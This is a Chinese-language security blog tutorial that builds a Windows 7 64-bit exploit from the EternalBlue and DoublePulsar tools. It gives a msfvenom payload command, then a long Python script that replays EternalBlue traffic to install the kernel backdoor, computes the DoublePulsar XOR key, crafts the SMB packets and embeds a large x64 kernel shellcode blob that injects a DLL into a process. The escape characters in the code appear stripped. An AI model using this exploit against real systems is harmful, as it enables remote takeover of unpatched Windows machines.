作者:東
预估稿费:400RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
在上一篇文章中,原文链接: http://bobao.360.cn/learning/detail/4012.html
我们构造了针对于Win 7三十二位操作系统攻击exploit,本节将完成一个win7 64位的exploit
上节回顾
win7 三十二位的exploit是由两部分功能代码组成的,一个是安装后门(Eternalblue) ,另一个则是后门维持(Doublepulsar)
1.Win7三十二位与六十四位安装后门 实际就是hook了ntdll!kiFastCallEntry。所以内核层函数的hook(后门安装)也是受内核版本影响
2.注入部分。没什么解释的,通常情况32位dll只能注入32位进程, 64位dll只能注入64位进程
想多了解些的可以读下15pb 赵神这篇 (关于32位和64位进程互读互写)
实验环境
网络环境: 局域网
攻击ip: 192.168.157.129(win7_x86)
靶机ip: 192.168.157.130(win7_x64)
工具: NSA的fb.py、wireshark、python、hex editor、
实验步骤
0x1: 一样的套路 开wireshark监听port 445捕捉到Eternalblue的数据流
0x2: 捕捉Doubleplusar动作的数据流
在六十四位下和三十二位包的数量都是一样的,可能不同就在某个字段上。
0x3: 数据包处理
接着就用上节的脚本来把Eternalblue攻击的数据包序列化供给我们的python调用
接着就是手动去分析Doubleplusar 在六十四位和三十二位的不同,参考文章:
http://bobao.360.cn/learning/detail/4074.html
发现是signature字段
三十二位: xxxxxxxxx0xxxxxx
六十四位: xxxxxxxxx1xxxxxx
其他没什么问题。
0x4: exploit构造脚本
关于测试dll的生成:
kali-> msfvenom -p windows/x64/exec CMD="calc.exe" -f dll > /x64.dll
这样生成就可以, 上面我用Doublepuls注入的dll是用msf生的。 注入哪个进程随你,脚本中默认是explorer。
测试dll要选择64位dll。否则可能出现蓝屏现象。
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import time
import ast
import binascii
import struct
HOST ='192.168.157.130'
PORT = 445
dllfile = "x64_calc.dll"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
def Install_Backdoor():
backlog = open("eternalblue.replay").read().split("nn")
backlog = [ast.literal_eval(i) for i in backlog]
connections = []
start = time.time()
for i in backlog:
delta = i[-1] - (start - time.time())
print(i[0], delta)
if delta > 0:
time.sleep(delta)
start = time.time()
if i[0] == "connect":
sock = socket.socket()
sock.connect((HOST , PORT ))
connections.append({"socket":sock,"stream" : i[1]})
if i[0] == "close":
[j['socket'].close() for j in connections if j["stream"] == i[1]]
if i[0] == "send":
[j['socket'].send(i[2]) for j in connections if j["stream"] == i[1]]
if i[0] == "recv":
[j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
def calculate_doublepulsar_xor_key(s):
"""Calaculate Doublepulsar Xor Key
"""
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
x = x & 0xffffffff # this line was added just to truncate to 32 bits
return x
def make_unicode_host(org_host):
host_len = len(org_host)
new_host = ""
for i in range(host_len):
new_host =new_host + "x00" + org_host[i]
return new_host
def get_smb_signature(smb_data):
print binascii.b2a_hex(smb_data[18:22])
return smb_data[18:22]
def get_key(smb_data):
smb_sign = struct.unpack("<I",get_smb_signature(smb_data))[0]
print "smb_sign:","0x%X"%(smb_sign)
int_key = calculate_doublepulsar_xor_key(smb_sign)
print "int_key:","0x%X"%(int_key)
key=struct.pack("<I",int_key)
print "key:",binascii.b2a_hex(key)
return key
def xor_data(org_data , key):
#异或加密
newdata = ""
for i in range(len(org_data)):
newdata += chr(ord(org_data[i]) ^ ord(key[i%len(key)]))
#print binascii.b2a_hex(newdata)
return newdata
def make_smb_request(send_data , key):
data_len = len(send_data)
array = []
ncount = data_len / 4096
if (data_len % 4096) > 0:
ncount += 1
make_data =""
for i in range(ncount):
if i < ncount-1:
smb_Length = struct.pack(">H",4096 +32 +34 + 12)
#print binascii.b2a_hex(smb_Length)
totalDataCount = struct.pack("<H",4096)
byteCount = struct.pack("<H",4096 + 13)
make_data = send_data[i*4096:(i+1)*4096]
else:
smb_Length = struct.pack(">H",data_len - 4096*i +32 +34 + 12)
totalDataCount = struct.pack("<H",data_len - 4096*i)
byteCount = struct.pack("<H",data_len - 4096*i+ 13)
make_data = send_data[i*4096:]
netBIOS_header = "x00x00"+ smb_Length
smb_header = "xFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00"
transRequest_header = "x0Fx0Cx00"+ totalDataCount +"x01x00x00x00x00x00x00x00xF0xCCx0Cx00x00x00x0Cx00x42x00"+totalDataCount+"x4Ex00x01x00x0Ex00"+ byteCount +"x00"
data_index = struct.pack(">H",i*0x10)
data_header = "x00x2Cx00x00"+totalDataCount+"x00x00"+data_index+"x00x00"
#print "data_index:",binascii.b2a_hex(data_index)
#print "data_header:",binascii.b2a_hex(data_header)
#print len(data_header)
array.append(netBIOS_header + smb_header +transRequest_header + xor_data(data_header + make_data,key))
return array , ncount
if __name__ == "__main__":
#安装后门
Install_Backdoor()
print "------Install backdoor done!------"
#上传并执行dll
#smb 头是32字节 请求包50字节 ,以下一行30字节
#smb版本
step_0_data ="x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x00x62x00x02x50x43x20x4Ex45x54x57x4Fx52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6Fx77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54x20x4Cx4Dx20x30x2Ex31x32x00"
s.sendall(step_0_data)
data = s.recv(1024)
print 0,data
#windows系统版本
step_1_data ="x00x00x00x88xFFx53x4Dx42x73x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x0DxFFx00x88x00x04x11x0Ax00x00x00x00x00x00x00x01x00x00x00x00x00x00x00xD4x00x00x00x4Bx00x00x00x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00x2Ex00x30x00x00x00"
s.sendall(step_1_data)
data = s.recv(1024)
print 1,data
#对方ip地址 x.x.x.x 其中有2个字节与x86的不一致
str_ip = "xFFx53x4Dx42x75x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x08x40x00x04xFFx00x5ex00x08x00x01x00x33x00x00x5Cx00x5C"+ make_unicode_host(HOST)+"x00x5Cx00x49x00x50x00x43x00x24x00x00x00x3Fx3Fx3Fx3Fx3Fx00"
step_2_data ="x00x00x00"+chr(len(str_ip))+ str_ip
#print binascii.b2a_hex(step_2_data)
#print step_2_data
s.sendall(step_2_data)
data = s.recv(1024)
print 2,data
#验证得到signature
step_3_data ="x00x00x00x4ExFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x41x00x0Fx0Cx00x00x00x01x00x00x00x00x00x00x00x1Fx36xCEx00x00x00x0Cx00x42x00x00x00x4Ex00x01x00x0Ex00x0Dx00x00x00x00x00x00x00x00x00x00x00x00x00x00"
s.sendall(step_3_data)
response = s.recv(1024)
print 3,response
print 3,binascii.b2a_hex(response)
key = get_key(response)
#shellcode+dll
kernel_shellcode ="x48x89xE0x66x83xE4xF0x41x57x41x56x41x55x41x54x53x51x52x55x57x56x50x50xE8xBCx06x00x00x48x89xC3x48xB9xDFx81x14x3Ex00x00x00x00xE8x26x05x00x00x48x85xC0x0Fx84x55x03x00x00x48x89x05x9Cx07x00x00x48xB9xBAx1Ex03xA0x00x00x00x00xE8x07x05x00x00x48x85xC0x0Fx84x36x03x00x00x48x89x05x85x07x00x00x48xB9x84x06xE7xF9xFFxFFxFFxFFxE8xE8x04x00x00x48x85xC0x0Fx84x17x03x00x00x48x89x05x6Ex07x00x00x48xB9x4FxFExEBx15x00x00x00x00xE8xC9x04x00x00x48x85xC0x0Fx84xF8x02x00x00x48x89x05x57x07x00x00x48xB9xF9x30xACxA4x00x00x00x00xE8xAAx04x00x00x48x85xC0x0Fx84xD9x02x00x00x48x89x05x40x07x00x00x48xB9xCAxBExD0xECx00x00x00x00xE8x8Bx04x00x00x48x85xC0x0Fx84xBAx02x00x00x48x89x05x29x07x00x00x48xB9xAExB8x9Fx5DxFFxFFxFFxFFxE8x6Cx04x00x00x48x85xC0x0Fx84x9Bx02x00x00x48x89x05x12x07x00x00x48xB9x94x01x69xE3xFFxFFxFFxFFxE8x4Dx04x00x00x48x85xC0x0Fx84x7Cx02x00x00x48x89x05xFBx06x00x00x48xB9xF6x10x00xB8xFFxFFxFFxFFxE8x2Ex04x00x00x48x85xC0x0Fx84x5Dx02x00x00x48x89x05xE4x06x00x00x48xB9xCAxD6x5FxD2xFFxFFxFFxFFxE8x0Fx04x00x00x48x85xC0x0Fx84x3Ex02x00x00x48x89x05xCDx06x00x00x48xB9x79xA8x24x11x00x00x00x00xE8xF0x03x00x00x48x85xC0x0Fx84x1Fx02x00x00x48x89x05xB6x06x00x00x48xB9x37xC6x90x4Fx00x00x00x00xE8xD1x03x00x00x48x85xC0x0Fx84x00x02x00x00x48x89x05x9Fx06x00x00x48xB9x6CxE7xFEx10x00x00x00x00xE8xB2x03x00x00x48x85xC0x0Fx84xE1x01x00x00x48x89x05x88x06x00x00xE8x4Fx03x00x00x8Bx05x85x06x00x00x85xC0x0Fx84xC7x01x00x00xE8xD9x01x00x00x48x85xC0x0Fx84xB9x01x00x00x4Cx8Dx0Dx94x06x00x00x41x8Bx09x51x51x6Ax40x68x00x10x00x00x4Dx31xC0x48x8Dx15xD2x05x00x00x48xB9xFFxFFxFFxFFxFFxFFxFFxFFx48x83xECx20xFFx15x06x06x00x00x48x83xC4x38x59x89x0Dx5Fx06x00x00x48x85xC0x0Fx85x22x01x00x00x48x8Dx35x57x06x00x00x48x8Bx3Dx9Cx05x00x00xF3xA4x80x3Dx2Fx06x00x00x01x74x05xE8x96x02x00x00x48x8Bx35x4Dx05x00x00x8Bx0Dx0Fx06x00x00x48x01xCEx48x89xF1x44x8Bx25x06x06x00x00x48x8Bx11x48x39xD6x0Fx84xDEx00x00x00x48x31xC0x8Bx05xDDx05x00x00x48x29xC2x51x52x48x89xD1x48x83xECx20xFFx15xC3x05x00x00x48x83xC4x20x5Ax59x48x85xC0x74x2Ex4Dx31xC9x44x8Bx0DxCEx05x00x00x4Ax8Bx04x08x48x85xC0x74x1Bx4Cx01xE2x80x3DxBFx05x00x00x01x74x07x80x3Ax01x74x0FxEBx08x8Bx02x0FxBAxE0x05x72x05x48x8Bx09xEBx9Bx4Cx29xE2x48x89x15x0Bx05x00x00x48xBAx90x00x00x00x00x00x00x00x48x31xC9x48x83xECx40xFFx15x3Cx05x00x00x48x83xC4x40x48x85xC0x74x5Bx48x89x05xECx04x00x00xC6x80x80x00x00x00xC3x48x31xC9x51x6Ax01xFFx35xC9x04x00x00x51x4Cx8Dx88x80x00x00x00x4Dx31xC0x48x8Bx15xBFx04x00x00x48x89xC1x48x83xECx20xFFx15x02x05x00x00x48x83xC4x40x4Dx31xC9x4Dx31xC0x48x31xD2x48x8Bx0DxA6x04x00x00x48x83xECx20xFFx15xECx04x00x00x48x83xC4x20x48x83xECx20x48x8Dx0Dx4Dx04x00x00xFFx15xAFx04x00x00x48x8Bx0Dx38x04x00x00xFFx15xAAx04x00x00x48x83xC4x20x48x31xC0x48x8Dx3Dx9AxFCxFFxFFx48xB9x70x03x00x00x00x00x00x00xF3xAAx48x8Dx3Dx2Ax00x00x00x48xB9xD3x04x00x00x00x00x00x00x48x03x0DxE4x04x00x00xF3xAAx58x58x5Ex5Fx5Dx5Ax59x5Bx41x5Cx41x5Dx41x5Ex41x5Fx48x89xC4x48x31xC0xC3x53x56x51x52x48xB9x08x00x00x00x00x00x00x00x51x48x8Dx15xD1x03x00x00x48x83xECx20xFFx15x17x04x00x00x48x83xC4x20x48x85xC0x0Fx85xDDx00x00x00x48x8Bx35xB3x03x00x00x48x31xDBx8Bx1Dx66x04x00x00x8Bx04x1Ex83xF8x02x0Fx8CxB0x00x00x00x48x89xF1x48x83xECx20xFFx15xE9x03x00x00x48x83xC4x20xE8x57x02x00x00x8Bx0Dx5Ax04x00x00x39xC8x0Fx85x8Cx00x00x00x48x8Dx15x7Bx03x00x00x48x89xF1x48x83xECx20xFFx15xC6x03x00x00x48x89xF1xFFx15xC5x03x00x00x48x83xC4x20x48x85xC0x74x49x48x31xDBx8Bx1Dx0Bx04x00x00x48x8Bx04x18x48x85xC0x74x37x48x31xC9x8Bx1DxFDx03x00x00x66x8Bx0Cx18x48x8Bx44x18x08x48x85xC0x74x20x48x31xDBx8Bx1Dx02x04x00x00x48x29xD9x7Cx12x48x01xC8xE8x2Bx02x00x00x8Bx0DxEBx03x00x00x39xC8x74x3Fx31xC0x89x05x03x03x00x00x48x8Dx0Dx04x03x00x00x48x83xECx20xFFx15x62x03x00x00x48x83xC4x20x48x89xF1x48x83xECx20xFFx15x59x03x00x00x48x83xC4x20x59x81xF9x00x00x01x00x7Fx0Ex83xC1x04xE9xF3xFExFFxFFx59x48x89xF0xEBx03x48x31xC0x5Ax59x5Ex5BxC3x48x8Bx35xB7x02x00x00x8Bx0Dx79x03x00x00x48x01xCEx48x8Bx16x8Bx05x5Dx03x00x00x48x29xC2x48x31xC0x48xFFxC8x48xC1xE0x2Cx48x8Bx12x48x39xC2x72x0BxB8xE8x03x00x00x89x05x3Dx03x00x00xC3x56x51x52x48x83xECx20xFFx15x1Fx03x00x00x48x89xC6x8Bx05x36x03x00x00x48x01xC6xFFx15x05x03x00x00x48x89xF1x48x39xF0x77x17x48x8Dx90x00x05x00x00x48x39xF2x72x0Bx48x29xC6x89x35x00x03x00x00xEBx08x48x8Bx36x48x39xCEx75xDCx48x83xC4x20x5Ax59x5ExC3x53x52x51x55x48x89xE5x48x81xECx00x01x00x00x57x48x89xCFx48x89xD8x48x89x85x00xFFxFFxFFxE8xBBx00x00x00x48x89x85x08xFFxFFxFFxE8x48x01x00x00x48x89x85x10xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x9Ax01x00x00x48x89x85x18xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x8Fx01x00x00x48x89x85x20xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x84x01x00x00x48x89x85x28xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x89xF9x48x8Bx95x20xFFxFFxFFx48x8Bx9Dx10xFFxFFxFFxE8x0Fx01x00x00x48x89x85x30xFFxFFxFFx48x8Bx85x28xFFxFFxFFx48x8Bx8Dx30xFFxFFxFFxE8x55x01x00x00x66x89xC2x48x8Bx85x00xFFxFFxFFx48x8Bx8Dx18xFFxFFxFFxE8x49x01x00x00x5Fx48x81xC4x00x01x00x00x5Dx59x5Ax5BxC3x56x57x48x31xF6x8Bx70x3Cx48x01xC6x66x81x3Ex50x45x75x12x48x81xC6x88x00x00x00x48x31xFFx8Bx3Ex48x01xF8x5Fx5ExC3x48x31xC0xEBxF8x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x07x01xC8x48xFFxC6xEBxE7x5Fx59x5ExC3x56x57x52x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xD2x8Ax16x01xD0x48xFFxC6xE2xECx5Ax5Fx5ExC3x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x0Ax01xC8x48xFFxC6x48xFFxC6xEBxE4x5Fx59x5ExC3x56x48x89xC6x48x83xC6x18x48x31xC0x8Bx06x5ExC3x53x65x48x8Bx04x25x38x00x00x00x48x8Bx40x04x48xC1xE8x0Cx48xC1xE0x0Cx48x8Bx18x66x81xFBx4Dx5Ax74x08x48x2Dx00x10x00x00xEBxEEx5BxC3x57x56x51x48x31xFFx48x89xC6x48x31xC0x8Bx04xBAx48x01xF0xE8x40xFFxFFxFFx39xC8x74x0Ex48xFFxC7x48x39xDFx74x0BxEBxE4x59x5Ex5FxC3x48x89xF8xEBxF7x48x31xC0xEBxF2x56x48x89xC6x48x31xC0x8Bx41x1Cx48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x20x48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x24x48x01xF0x5ExC3x48xD1xE1x48x01xC8x66x8Bx00xC3x48x81xCAx00x00xFFxFFx48x81xF2x00x00xFFxFFx48xC1xE2x02x48x01xD1x48x31xD2x8Bx11x48x01xD0xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x28x03x00x00x20x00x00x00x70x00x00x00x08x03x00x00x4Cx00x00x00xC8x02x00x00x01x00x00x00xBDxA2x37x83x00x00x00x00x00x00x00x00x8Ax23x00x00x00x00x00x00x53x55x57x56x41x54x41x55x41x56x41x57x48x89xE0x48x89xE1x48x83xE1x08x48x29xCCx48x81xECx00x04x00x00xE8x00x00x00x00x5Dx48x89xE6x48x89x06x48x81xECx00x04x00x00x48x8Dx3DxD2x0Ex00x00x49x89xF0x48x83xC6x08x48x31xC9x8Ax0Fx84xC9x74x3Fx48xFFxC7x8Bx0Fx48x83xC7x04x8Bx17x48x83xC7x04x84xD2x74x2CxE8xD4x0Dx00x00x51x0FxB6x0Fx48x85xC9x59x75x09x48x85xC0x0Fx84xB9x0Dx00x00x48x89x06x48x83xC6x08x30xC0x48x83xC7x01x3Ax47x04x74xCCxEBxB8x4Cx89xC6x48x89x25x3Dx0Dx00x00x48x89x2Dx3Ex0Dx00x00x48x89x35x3Fx0Dx00x00x90xE8x00x00x00x00x59x4Dx31xC9x49x89xC8x48x31xD2xB2x01x48x8Dx0Dx2Ex0Dx00x00x48x83xECx20xFFx56x38x48x83xC4x20x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x31xD2x8Bx95x5Dx0Fx00x00x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x0Fx84xCFx0Cx00x00x48x89xC3x56x8Bx8Dx5Dx0Fx00x00x48x8Dx35x80x0Ex00x00x48x89xDFxF3xA4x5Ex48x89x5Ex48x48x31xC0x8Bx85x5Dx0Fx00x00x48x89x46x50x48x31xC9x8Bx8Dx5Dx0Fx00x00x48x8Dx3Dx59x0Ex00x00x31xC0xF3xAAx48x31xC0x48x89x46x58x48x89x46x60x48x89x46x68x48x8Dx05x77x09x00x00x48x89x05xC4x02x00x00x48x8Dx05x71x09x00x00x48x89x05xBEx02x00x00x48x8Dx05x78x09x00x00x48x89x05xB8x02x00x00x48x8Dx05x86x09x00x00x48x89x05xB2x02x00x00x48x8Dx05xA7x08x00x00x48x89x05xACx02x00x00x55x48x8Dx2DxD6x01x00x00x48x8Bx7Ex48xE8xA3x02x00x00x48x85xC0x0Fx85x13x01x00x00xE8x1Ax03x00x00x48x85xC0x0Fx84x05x01x00x00x48x89x45x20x48x8Bx7Dx08x48x83xC7x30x48x8Bx3Fx48x8Bx45x20x48x29xF8x48x89x45x28xE8x64x03x00x00x48x85xC0x0Fx85xDDx00x00x00xE8xE6x03x00x00x48x85xC0x0Fx85xCFx00x00x00xE8x4Ex05x00x00x48x85xC0x0Fx85xC1x00x00x00xE8x57x05x00x00x48x85xC0x0Fx85xB3x00x00x00xE8x57x06x00x00x48x85xC0x0Fx85xA5x00x00x00xE8xBAx06x00x00x48x85xC0x0Fx85x97x00x00x00xE8xC6x07x00x00x48x85xC0x0Fx85x89x00x00x00x48x8Bx45x20x48x89x46x70x48x8Bx45x18x48x89x46x78x5Dx8Bx85x61x0Fx00x00x89x86x80x00x00x00x48x8Bx56x70x48x63x42x3Cx48x8Dx9Cx10x88x00x00x00x48x85xDBx74x48x8Bx1Bx48x01xD3x83x7Bx14x00x74x3Dx8BxBEx80x00x00x00x2Bx7Bx10x3Bx7Bx14x7Fx2Fx8Bx4Bx1Cx48x01xD1x8Bx04xB9x48x01xD0x48x83xECx20x4Cx8Bx46x50x48x8Bx56x48x48xB9x02x00x00x00x00x00x00x00xFFxD0x48x83xC4x20x48x89x86x88x00x00x00x55x48x8Dx2DxB8x00x00x00xE8x28x07x00x00xEBx00x48x8Bx4Dx78x48x85xC9x74x0Bx48x83xECx20xFFx56x40x48x83xC4x20x48x8Bx7Dx20x48x85xFFx0Fx84x8Ax00x00x00x4Cx8Dx8DxAAx00x00x00x49xB8x40x00x00x00x00x00x00x00x48x8Bx55x50x48x8Bx4Dx20x48x83xECx20xFFx56x30x48x83xC4x20x48x85xC0x74x09x48x8Bx4Dx50x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFx56x10x48x83xC4x20x48x8Bx7Dx60x48x85xFFx74x2Cx48x8Bx4Dx68x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx60x48x83xECx20xFFx56x10x48x83xC4x20x5DxE9x60x0Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48xB8xFFxFFxFFxFFxFFxFFxFFxFFxE9x2ExFCxFFxFFx6Dx73x76x63x72x74x2Ex64x6Cx6Cx00x6Dx73x76x63x72x74x64x2Ex64x6Cx6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x57x52x53x48x89x7Dx00x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax75x63x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89x7Dx08x48x89xFAx48x83xC2x00x8Bx1Ax81xFBx50x45x00x00x75x3Fx48x89xFAx48x83xC2x18x66x8Bx1Ax66x81xFBx0Bx02x75x2Ex48x89xFAx48x83xC2x14x48x31xDBx66x8Bx1Ax48x89xFAx48x83xC2x18x48x01xDAx48x89x55x10x48x89xFAx48x81xC2x88x00x00x00x48x89x55x18x48x31xC0xEBx06x48x31xC0x48xF7xD0x5Bx5Ax5FxC3x57x52x53x48x8Bx7Dx08x48x83xC7x50x48x31xDBx8Bx1Fx48x89x5Dx50x48x8Bx7Dx08x48x83xC7x30x48x8Bx17x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xD1x48x89xDAx48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x75x25x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xDAx48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx76x48x48x8Bx7Dx20x48x8Bx5Dx08x48x83xC3x54x48x31xC9x8Bx0BxF3xA4x5Ex48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x74x4Dx48xB8x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x56x48x8Bx76x48x48x89xC1x48x83xC1x14x4Dx31xD2x44x8Bx11x4Cx01xD6x48x8Bx7Dx20x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x48x83xC0x10x48x31xC9x8Bx08xF3xA4x5Ex48xFFxC2xEBxAEx48x31xC0xEBx06x48x31xC0x48xF7xD0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx20xE8x6CxFExFFxFFx48x85xC0x0Fx85x50x01x00x00xE8x1Fx05x00x00x48x85xC0x0Fx85x42x01x00x00x48x8Bx7Dx00x48xB8x08x00x00x00x00x00x00x00x48xBAx01x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x00x48x31xDBx8Bx1Ax48x01xFBx48x89x5Dx30x48x39xFBx0Fx84x0Fx01x00x00x49x89xDAx49x83xC2x10x48x31xC0x41x8Bx02x48x85xC0x0Fx84xF9x00x00x00x48x8Bx45x00x48x89xDAx48x83xC2x0Cx4Dx31xD2x44x8Bx12x4Cx01xD0x48x89xC1x48x83xECx20xFFx56x18x48x83xC4x20x48x85xC0x0Fx84xC6x00x00x00x48x89x45x48x48x89xDAx48x83xC2x00x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx38x48x89xDAx48x83xC2x10x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx40x48x8Bx55x38x48x8Bx12x48x85xD2x74x7Dx48x89xD7x49xBAx00x00x00x00x00x00x00x80x4Cx21xD7x74x0Cx48x89xD7x48x81xE7xFFxFFx00x00xEBx0Bx48x8Bx7Dx00x48x01xD7x48x83xC7x02x48x89xFAx48x8Bx4Dx48x48x83xECx20xFFx56x20x48x83xC4x20x48x85xC0x74x46x48x8Bx55x40x48x89x02xE8x07x06x00x00x48x85xC0x74x0FxE8x97x05x00x00x48x85xC0x75x05xE8xF0x04x00x00x48x8Bx55x38x48x83xC2x08x48x89x55x38x48x8Bx55x40x48x83xC2x08x48x89x55x40xE9x77xFFxFFxFFx48x83xC3x14xE9xF9xFExFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x48x8Bx7Dx08x48x83xC7x30x48x8Bx55x20x48x89x17x48x31xC0x5Ax5FxC3x57x52x53x51x48x8Bx55x28x48x85xD2x0Fx84xF5x00x00x00x48xB8x08x00x00x00x00x00x00x00x48xBAx05x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xC1x00x00x00x49x89xD2x49x83xC2x00x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xA3x00x00x00x48x8Bx55x20x48x01xFAx49x89xD2x49x83xC2x04x41x8Bx3Ax48x85xFFx0Fx84x91x00x00x00x48x83xEFx08x48xD1xEFx48x31xC9x48x39xF9x74x65x48x89xD3x48x83xC3x08x48x89xC8x48xD1xE0x48x01xC3x48xC7x45x58x00x00x00x00x66x8Bx03x66x25x00xF0x66xC1xE8x0Cx66x83xF8x00x74x37x66x83xF8x03x74x06x66x83xF8x0Ax75x2Bx49x89xD2x49x83xC2x00x41x8Bx02x48x89x45x58x48x31xC0x66x8Bx03x66x25xFFx0Fx48x01x45x58x48x8Bx45x20x48x03x45x58x48x8Bx5Dx28x48x01x18x48xFFxC1xEBx96x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x01xFAxE9x64xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx03x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x89xD1x48x83xC1x04x48x31xC0x8Bx01x48x85xC0x74x36x48x89xD1x48x83xC1x00x48x31xFFx8Bx39x48x85xFFx74x25x48x8Bx4Dx20x49x89xC8x48x01xF9x48x89x4Dx78x48x31xD2xBFx0Cx00x00x00xF7xF7x89xC2x48x83xECx20xFFx56x38x48x83xC4x20x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x0Fx84xE6x00x00x00x48xB8x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x49x89xC2x49x83xC2x24x48x31xFFx41x8Bx3AxC7x85xA6x00x00x00x00x00x00x00x48xF7xC7x00x00x00x02x0Fx85x9Fx00x00x00x48xF7xC7x00x00x00x40x74x0AxC7x85xA6x00x00x00x02x00x00x00x49xBAx00x00x00x80x00x00x00x00x4Cx85xD7x74x0AxC7x85xA6x00x00x00x04x00x00x00x48xF7xC7x00x00x00x20x74x26x83xBDxA6x00x00x00x02x75x0AxC7x85xA6x00x00x00x20x00x00x00x83xBDxA6x00x00x00x04x75x0AxC7x85xA6x00x00x00x40x00x00x00x48x8Bx7Dx20